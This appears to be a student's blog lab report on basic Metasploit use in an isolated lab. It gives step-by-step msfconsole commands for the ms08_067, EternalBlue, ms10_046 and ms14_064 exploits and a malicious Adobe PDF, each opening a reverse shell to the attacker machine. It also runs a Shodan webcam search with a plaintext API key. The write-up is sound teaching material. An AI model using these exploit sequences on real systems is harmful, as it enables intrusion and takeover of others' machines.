2018-2019-2 网络对抗技术 20165324 Exp5:MSF基础应用

MSF基础知识:

  • MSF基础框架:

  • 主要模块模块(Module)。模块是指Metasploit框架中所使用的一段软件代码组件。

    • 渗透攻击模块(Exploit Modules):是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
    • 辅助模块(Auxiliary Modules): 能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    • 攻击载荷(Payload Modules):原意指导‘载荷’,就是被运输的东西。在我们的上下文环境中就是指一段指令或称为shellcode。
    • 空字段模块(Nop Modules):是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令。
    • 编码模块(Encoders):攻击载荷模块与空指令模块组装完成一个指令序列后进行。
    • 后渗透攻击模块(Post):使你能够收集更多信息或获得对已开发目标系统的进一步访问的模块。
  • 用户操作界面:

    • msfconsole
    • armitage
    • webgui

课下实践

  • 实践内容(3.5分)本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    • 一个主动攻击实践

      • 实现ms08_067(成功)
      • 实现MS17_010_eternalblue(成功)
    • 一个针对浏览器的攻击

      • ms10_046的攻击(成功)
      • ms14_064的攻击(唯一、成功)
    • 一个针对客户端的攻击

      • Adobe(成功)
    • 成功应用任何一个辅助模块

      • 网络摄像头(成功)
  • 基础问题回答

    • 用自己的话解释什么是exploit,payload,encode.

      • exploit是载具,将payload传送到靶机中。
      • payload是载荷,是主要攻击的功能代码。
      • encode是编码,用来改变payload,实现免杀。
    • 实践总结与体会
      • 本次实验需要不同的靶机,实验步骤需要一步一步的认真检查,才能避免不必要的失误。事先环境的选择和准备都要充分,实验才能持续连贯下去,不然很可能像我一样,做到后面才发现IP地址变了,实验只能重复一些步骤,浪费了不少时间。
    • 离实战还缺些什么技术或步骤?
      • 实验还得需要合适的靶机才能完成,找到了漏洞,只有在相对应的靶机上才能进行入侵。
内容5.1:主动攻击实践:ms08_067
  • 实验准备:靶机windows xp sp3(英文版)(IP:192.168.44.138)、攻击机kali(192.168.44.136)。
  • 命令行输入msfconsole,然后输入以下指令:
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp //tcp反向回连
set LHOST 192.168.44.136 //攻击机ip
set LPORT 5324 //攻击端口
set RHOST 192.168.44.138 //靶机ip,特定漏洞端口已经固定
set target 0 //自动选择目标系统类型,匹配度较高
exploit //攻击
  • 可通过show payloads命令,查看可使用的payload模块,可更换模块进行尝试。
  • 实验截图:

内容5.2:实现MS17_010_eternalblue
  • 靶机:Microsoft Windows 7
  • payload : generic/shell_reverse_tcp
  • 实验步骤:
use exploit/windows/smb/ms17_010_eternalblue    #使用漏洞
show payloads #显示可用攻击载荷
set payload generic/shell_reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 192.168.44.136 #设置监听地址
set RHOSTS 192.168.44.137 #设置靶机地址
exploit #开始攻击
  • 如图攻击成功:

内容5.3:针对浏览器的攻击,如ms10_046
  • 攻击机:kali 、靶机:WindowsXP ,IE版本:7.0/8.0

  • 命令行输入msfconsole,然后输入以下指令:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用浏览器ms10_046漏洞
set payload windows/meterpreter/reverse_http //http反向回连
set LHOST 192.168.44.:141//攻击机ip
set LPORT 5324 //攻击端口固定
exploit
  • 如图在靶机的浏览器上输入:http://192.168.44.141:80/

  • 选择session,建立会话:

内容5.4实现ms14_064漏洞
  • 靶机:windows XP 浏览器:IE版本:7.0/8.0

  • 实验步骤:

use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.44.141
set AllowPowerShellPrompt=true
set target 0
exploit

  • 在靶机的浏览器上输入http://192.168.44.141:8080/3Kxf1X

  • 选择session,建立回话

内容5.5实现Adobe
  • 靶机:Windows XP
  • 实验步骤
use windows/fileformat/adobe_cooltype_sing  #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.44.141 #攻击者地址
set FILENAME 20165324hcj.pdf #设置生成pdf文件的文件名
exploit #攻击
  • 20165324hcj.pdf文件的生成:

  • 找到20165324.pdf文件,传输到靶机,并运行

  • kali上进行监听:
use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.44.141 #攻击者地址
exploit #攻击
  • 如图攻击成功

内容5.6辅助模块的使用
  • 网络摄像头的查找
gather/shodan_search查找网络摄像头
use auxiliary/gather/shodan_search使用辅助模块
查看需要输入的参数show options
  • shodan官网注册账号,登陆查看账户API后设置APIKEY set F9MYLmsRI1qvIGG9LJvjYndut8hFvAB4
  • set QUERY "webcamXP"
  • 执行:run

!

2018-2019-2 网络对抗技术 20165324 Exp5:MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  10. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

随机推荐

  1. 【线程】Volatile关键字

    Volatile变量具有 synchronized 的可见性特性,但是不具备原子特性.这就是说线程能够自动发现 volatile变量的最新值.Volatile变量可用于提供线程安全,但是只能应用于非常 ...

  2. smarty 双引号中嵌入变量的方法

    1.如果变量中只包含字符.数字.下划线,可以将变量直接写在双引号中,如:"my name is $name" 2.如果带有其它字符,如“.”,则需要将变量用单引号括起来,如:“my ...

  3. Debian的自动化安装(DEBIAN_FRONTEND)

    Debian 安装程序的参数 安装系统确认一些附加的引导参数 debconf/priority 这些参数设置将设置显示的信息为为最低的级别. 缺省安装使用 debconf/priority=high ...

  4. 【CF896E】Welcome home, Chtholly 暴力+分块+链表

    [CF896E]Welcome home, Chtholly 题意:一个长度为n的序列ai,让你支持两种操作: 1.l r x:将[l,r]中ai>x的ai都减去x.2.l r x:询问[l,r ...

  5. 数据库操作相关(sql语句-命令行)

    创建数据库: create database books; 创建用户: mysql> grant select,insert,delete,uptate     -> on books.* ...

  6. win10中强制vs2015使用管理员启动

    文章转自: win10中强制vs2015使用管理员启动   首先,和网上流传的版本一样,需要做这下面这两步: 1. 打开VS快捷方式的属性对话框.   2.勾选“用管理员身份运行”   现在,你双击V ...

  7. ZooKeeper (一)概览

    注:出于记录对 zookeeper 的学习研究成果目的,并分享经验,根据官方文档翻译整理而成本文,原文地址: http://zookeeper.apache.org/doc/trunk/zookeep ...

  8. ELK之在windows安装filebeat收集日志

    登录官方网站下载filebeat的windows客户端 https://www.elastic.co/downloads/beats 下载压缩包,无需解压 修改配置文件filebeat.yml 其余设 ...

  9. logstash实战filter插件之grok(收集apache日志)

    有些日志(比如apache)不像nginx那样支持json可以使用grok插件 grok利用正则表达式就行匹配拆分 预定义的位置在 /opt/logstash/vendor/bundle/jruby/ ...

  10. CSU 1808 - 地铁 - [最短路变形]

    题目链接:http://acm.csu.edu.cn/csuoj/problemset/problem?pid=1808 Time limit: 5000 ms Memory limit: 13107 ...